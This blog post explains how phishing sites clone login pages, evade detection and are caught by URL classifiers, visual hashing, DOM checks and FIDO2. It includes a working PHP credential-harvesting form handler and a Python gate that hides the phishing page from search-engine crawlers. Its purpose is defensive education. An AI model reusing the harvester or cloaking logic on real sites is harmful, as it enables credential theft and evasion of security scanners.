James Smith

Posted on Apr 3

How Phishing Websites Trick Users and How to Detect Them

#security #cybersecurity #webdev #scams

An in-depth look at the mechanics of deceit and the algorithms counteracting it.
It was 11:47 PM when Sarah, a top engineer at a fintech startup, clicked a link in what looked like a routine Slack notification. The message said that her GitHub token had expired and that she needed to reauthorize. The page that loaded matched the GitHub login screen down to the last detail: the same font, the same layout, the same green button. She typed in her credentials and went to bed.
By morning, her company's private repositories had been cloned, its AWS secrets had been stolen, and three production databases were quietly leaking their data to a server in Eastern Europe.
The page wasn't GitHub. It was a near-verbatim copy, built in under two hours with a freely downloadable phishing kit, hosted on a hacked WordPress blog, and delivered through a weaponized Slack webhook.
This is how phishing works today. To understand why it is so effective, you have to dissect not only the human psychology it preys on but also the technical engine that runs it.

The Structure of a Phishing Page

Fundamentally, a phishing site has to do two things: look believable, and capture the information before the victim notices that something is wrong. Modern phishing kits handle both in frightening detail.
Most phishing pages are no longer built by hand; they are cloned. Tools such as HTTrack, wget --mirror, or custom scraping code download the HTML, CSS, JavaScript, and image resources of a legitimate site in a few minutes. The attacker then injects a form handler, usually a few lines of PHP, that captures the POST data and redirects the victim to the real site. From the user's perspective, the first login attempt simply failed and the second one succeeded.

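Credential harvester (PHP)

```php
<?php
// Capture whatever the cloned login form submitted
$data = $_POST;
file_put_contents('logs.txt', json_encode($data) . "\n", FILE_APPEND);
// Redirect to the real site so the failed login looks routine
header('Location: https://real-site.com/login-error');
exit();
?>
```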

That's only a handful of lines, and it is all that the thousands of credential-harvesting campaigns launched each month need. The truly interesting engineering sits one layer further down: how phishing operators keep a site alive long enough to collect valuable data without being detected.

The Evasion Stack: How Phishing Sites Stay Unnoticed

A phishing site that Google Safe Browsing flags within an hour is worth very little. Operators have therefore developed a sophisticated evasion stack to maximize uptime. Every layer delays detection and gives the attacker more time to harvest.

IDN Homoglyph Attacks

The initial defense of attackers is domain cloaking. Attacks on homoglyphs of IDN are also quite cunning: Unicode provides characters of various scripts that are a visual match to Latin characters. Most fonts are pixel-identical in the Cyrillic 'a' (U+0430) to the Latin 'a' (U+0061). So, paypal.com and paypal.com are identical on the face of it but serve different DNS records completely.
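One way a defender might catch this kind of spoof is to look for hostname labels that mix scripts. The sketch below is a rough heuristic, not a production check: it approximates a character's script from the first word of its Unicode name, and the helper names `scripts_in_label` and `is_mixed_script` are made up for this illustration.

```python
import unicodedata

def scripts_in_label(label):
    """Return the scripts (approximated from Unicode character names) used in a label."""
    scripts = set()
    for ch in label:
        if ch.isalpha():
            # unicodedata.name() gives e.g. "CYRILLIC SMALL LETTER A";
            # the first word serves as a rough script name.
            scripts.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return scripts

def is_mixed_script(hostname):
    """Flag hostnames in which a single label mixes more than one script."""
    return any(len(scripts_in_label(label)) > 1 for label in hostname.split("."))

latin = "paypal.com"
spoofed = "p\u0430ypal.com"  # second character is Cyrillic U+0430

print(is_mixed_script(latin))    # False
print(is_mixed_script(spoofed))  # True
print(spoofed.encode("idna"))    # the Punycode (xn--) form that DNS actually sees
```

A label written entirely in one non-Latin script would pass this check, so it only covers the mixed-script case described above.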

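The next layer is traffic filtering: a gate in front of the page decides whether a visitor looks like a real victim or like a crawler or scanner, and only the former is served the phishing payload.

Traffic filtering gate logic (Python)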

```python
import ipaddress

# Crawler IP ranges the gate refuses to serve
BLOCKED_RANGES = [
    "66.249.0.0/16",  # Google
    "157.55.0.0/16",  # Bing
    "40.77.0.0/16",   # Microsoft
]

def ip_in_range(ip, cidr):
    return ipaddress.ip_address(ip) in ipaddress.ip_network(cidr)

def should_serve_payload(request):
    ip = request.remote_addr
    ua = request.headers.get('User-Agent', '')
    referrer = request.headers.get('Referer', '')

    if any(ip_in_range(ip, r) for r in BLOCKED_RANGES):
        return False
    if 'bot' in ua.lower() or 'crawler' in ua.lower():
        return False
    if not referrer:  # Direct access, likely a scanner
        return False
    return True
```

The Detection Side: Algorithms Fighting Back

Browser vendors, email providers, and security companies run detection systems that combine several types of signal at once. Modern phishing classifiers are typically either a gradient-boosted tree ensemble (XGBoost or LightGBM) or a fine-tuned transformer model trained on URL and page-content features.

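Extracting URL-based features (Python)

```python
import re
from urllib.parse import urlparse

# shannon_entropy(), is_self_signed(), BRAND_LIST, and TLD_RISK_TABLE are
# assumed to be defined elsewhere; is_self_signed() needs a live TLS handshake.

def extract_url_features(url):
    parsed = urlparse(url)
    host = parsed.hostname or ""
    labels = host.split('.')
    return {
        "url_length": len(url),
        "num_subdomains": host.count('.'),
        "has_ip_address": bool(re.fullmatch(r'\d+\.\d+\.\d+\.\d+', host)),
        "num_special_chars": sum(url.count(c) for c in ['@', '?', '-', '=', '#', '%', '+']),
        "domain_entropy": shannon_entropy(host),
        "brand_in_subdomain": any(b in labels[:-2] for b in BRAND_LIST),
        # urlparse() results have no .suffix attribute, so use the last label as the TLD
        "tld_suspicion_score": TLD_RISK_TABLE.get(labels[-1], 0.5),
        "https_mismatch": parsed.scheme == 'https' and is_self_signed(url),
    }
```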

The brand_in_subdomain check catches the paypal.com.secure-login.xyz pattern: PayPal appears in the hostname, but it is not the registered domain. The domain_entropy feature catches algorithmically generated domains, such as those a botnet generates to host phishing pages, whose random-looking names tend to have unusually high Shannon entropy.
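To make these two features concrete, here is a minimal sketch of how they could be computed. The `BRANDS` list and the sample hostnames are illustrative assumptions, and the split on the last two labels is deliberately naive (it mishandles suffixes such as .co.uk).

```python
import math
from collections import Counter

def shannon_entropy(text):
    """Shannon entropy of a string, in bits per character."""
    if not text:
        return 0.0
    total = len(text)
    counts = Counter(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())

def brand_in_subdomain(hostname, brands):
    """True if a brand appears as a label to the left of the last two labels."""
    # Naive assumption: the last two labels form the registered domain.
    subdomain_labels = hostname.lower().split(".")[:-2]
    return any(brand in subdomain_labels for brand in brands)

BRANDS = ["paypal", "github"]  # illustrative list

print(brand_in_subdomain("paypal.com.secure-login.xyz", BRANDS))  # True
print(brand_in_subdomain("www.paypal.com", BRANDS))               # False

# A random-looking label scores higher than a dictionary-like one.
print(shannon_entropy("x7k2q9vbz3") > shannon_entropy("paypal"))  # True
```

Entropy also grows with the number of distinct characters, so in practice it would be one feature among many for the classifier and not a verdict on its own.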

Visual Similarity Detection

Visual similarity detection is the most computationally expensive signal to compute and the hardest one for attackers to evade. The method employed by Google and Microsoft combines perceptual hashing (pHash) with a CNN classifier that works on screenshots. The pipeline:

Renders the suspect page in a headless browser.
Computes a perceptual hash of the above-the-fold screenshot.
Compares it against a list of hashes of legitimate login pages.
If the similarity exceeds a threshold, passes the screenshot to a finer-grained CNN for brand classification.
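The hash-and-compare steps can be sketched in a few lines. Note the substitutions: this uses average hash (aHash), a simpler relative of pHash, and operates on toy grayscale grids instead of real screenshots, so no headless browser or image library is involved. The function names and the `max_distance` threshold are assumptions for illustration only.

```python
def average_hash(pixels):
    """Average hash of a grayscale image given as rows of 0-255 integers.

    Each bit is 1 where the pixel is brighter than the image mean.
    A real pipeline would first downscale the screenshot, e.g. to 8x8.
    """
    flat = [p for row in pixels for p in row]
    mean = sum(flat) / len(flat)
    return [1 if p > mean else 0 for p in flat]

def hamming_distance(hash_a, hash_b):
    """Number of bit positions in which the two hashes differ."""
    if len(hash_a) != len(hash_b):
        raise ValueError("hashes must have the same length")
    return sum(a != b for a, b in zip(hash_a, hash_b))

def find_visual_match(candidate, known_hashes, max_distance=2):
    """Return the name of the first known page within max_distance bits, else None."""
    for name, known in known_hashes.items():
        if hamming_distance(candidate, known) <= max_distance:
            return name
    return None

# Toy 4x4 "screenshots": a reference login page and a slightly brightened clone.
reference = [
    [250, 250, 250, 250],
    [250,  30,  30, 250],
    [250,  30,  30, 250],
    [ 40, 200, 200,  40],
]
clone = [[min(255, p + 5) for p in row] for row in reference]
unrelated = [[(r * 4 + c) * 16 for c in range(4)] for r in range(4)]

known = {"example-login": average_hash(reference)}
print(find_visual_match(average_hash(clone), known))      # example-login
print(find_visual_match(average_hash(unrelated), known))  # None
```

Because the hash depends only on which pixels are brighter than the mean, small color shifts in a cloned page leave it unchanged, which is what makes this family of hashes useful as a cheap first filter before the CNN.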

How ML Models Are Trained and Where They Fail

The most common training approach relies on labeled datasets such as PhishTank, OpenPhish, and APWG's eCrime dataset. The pipeline starts with raw URLs, runs them through feature extraction and model training, and feeds the results into a live blocklist.

The most serious weakness of this pipeline is timing: the average phishing site lives only 4 to 12 hours before it lands on the Google Safe Browsing blocklist. For zero-day phishing attacks on domains registered within the last 24 hours, URL-only classifiers detect fewer than 40% of cases, because the domain itself has no reputation signal yet. That is why visual similarity detection and DOM analysis have become the most important complements to URL-based scoring.
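As one illustration of what a DOM-level signal might look like, the sketch below finds forms that contain a password field and flags those that post somewhere other than the host the page is expected to belong to. It assumes the expected host is already known (for example, from a visual brand match); the class and function names, and the example URLs, are hypothetical.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class PasswordFormFinder(HTMLParser):
    """Collect the action attribute of every form that contains a password input."""

    def __init__(self):
        super().__init__()
        self._current_action = None  # action of the form being parsed, if any
        self._has_password = False
        self.password_form_actions = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current_action = attrs.get("action") or ""
            self._has_password = False
        elif tag == "input" and self._current_action is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._has_password = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current_action is not None:
            if self._has_password:
                self.password_form_actions.append(self._current_action)
            self._current_action = None

def suspicious_password_forms(html, page_url, expected_host):
    """Return absolute action URLs of password forms that do not post to expected_host."""
    finder = PasswordFormFinder()
    finder.feed(html)
    flagged = []
    for action in finder.password_form_actions:
        target = urljoin(page_url, action)  # resolve relative actions
        if urlparse(target).hostname != expected_host:
            flagged.append(target)
    return flagged

cloned_html = (
    '<form action="post.php" method="post">'
    '<input type="text" name="login"><input type="password" name="password">'
    '</form>'
)
print(suspicious_password_forms(
    cloned_html, "https://blog.example.net/wp-content/login/", "login.example.com"))
# ['https://blog.example.net/wp-content/login/post.php']
```

Unlike URL reputation, this signal does not depend on the domain's age, which is why it can help with pages on freshly registered or compromised hosts.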

The Human Layer: Technical Defenses Are Not Sufficient

Even all of this technology (perceptual hashing, gradient-boosted classifiers, DOM fingerprints, and so on) cannot reliably stop a well-timed, highly targeted spear-phish delivered over a trusted channel.
The attack on Sarah did not succeed because her browser's phishing filter failed (the URL, being newly registered, was probably never scanned at all). It succeeded because the delivery mechanism, a Slack message sent through a compromised webhook, bypassed all email-based filtering, and because the urgency of the message ("your token expired") led her to skip her usual verification habits.

FIDO2: Making Phishing Technically Infeasible

The strongest technical countermeasure available is the FIDO2 hardware key. Because authentication is cryptographically bound to the origin domain, even a pixel-perfect copy of a login page cannot complete a WebAuthn challenge; the key simply refuses to sign for a different origin. For organizations, this turns credential phishing from a likely attack into something close to a technical impossibility.
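The origin binding can be illustrated with the two origin-related fields of a WebAuthn assertion: the `origin` in clientDataJSON, which the browser fills in, and the SHA-256 hash of the relying party ID that occupies the first 32 bytes of the authenticator data. The sketch below checks only those two fields and deliberately omits signature, challenge, and flag verification; `simulated_assertion` is a toy stand-in for a browser and key, and the domains are placeholders.

```python
import hashlib
import json

def verify_origin_binding(client_data_json, authenticator_data, expected_origin, rp_id):
    """Check the origin and RP ID hash of a WebAuthn assertion (partial check only)."""
    client_data = json.loads(client_data_json)
    if client_data.get("origin") != expected_origin:
        return False
    rp_id_hash = hashlib.sha256(rp_id.encode("utf-8")).digest()
    return authenticator_data[:32] == rp_id_hash

def simulated_assertion(origin, rp_id):
    """Build the origin-bearing parts of an assertion for demonstration purposes."""
    client_data_json = json.dumps({
        "type": "webauthn.get",
        "challenge": "c2VydmVyLWNoYWxsZW5nZQ",  # placeholder value
        "origin": origin,                        # set by the browser, not the page
    }).encode("utf-8")
    # Layout: 32-byte RP ID hash, 1 flags byte, 4-byte signature counter
    authenticator_data = (
        hashlib.sha256(rp_id.encode("utf-8")).digest() + b"\x01" + (0).to_bytes(4, "big")
    )
    return client_data_json, authenticator_data

EXPECTED_ORIGIN = "https://login.example.com"
RP_ID = "example.com"

genuine = simulated_assertion("https://login.example.com", "example.com")
phished = simulated_assertion("https://login.example.com.evil.test",
                              "login.example.com.evil.test")

print(verify_origin_binding(*genuine, EXPECTED_ORIGIN, RP_ID))  # True
print(verify_origin_binding(*phished, EXPECTED_ORIGIN, RP_ID))  # False
```

In a real flow the look-alike page would typically not get this far, since the key holds no credential scoped to the attacker's domain; the server-side check is a second line of the same defense.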

Where the Defenses Converge

Real-time visual similarity checks at the browser level.
LLM-assisted DOM analysis that reasons about behavioral intent rather than relying on pattern matching alone.
Reputation propagation networks that let organizations share phishing indicators at machine speed.
WebAuthn adoption, together with email filters that flag newly registered domains, to reduce subdomain abuse and phishing.

Closing Thoughts

The arms race between phishing and detection systems is really an asymmetry problem. An attacker has to deceive one person, once. Defenders have to catch every variant, at scale, in near real time, across every possible delivery channel.
The tooling on the defensive side has never been more advanced, but it is chasing an adversary that iterates daily and runs automated infrastructure, one that will abandon an entire phishing kit the moment it is flagged and spin up a new one in less than an hour.
Learning the mechanics is not merely an academic exercise. It is essential for building resilient systems and informed users. Staying updated through trusted resources like Scam Alerts can provide an additional layer of awareness against rapidly evolving phishing tactics.

DEV Community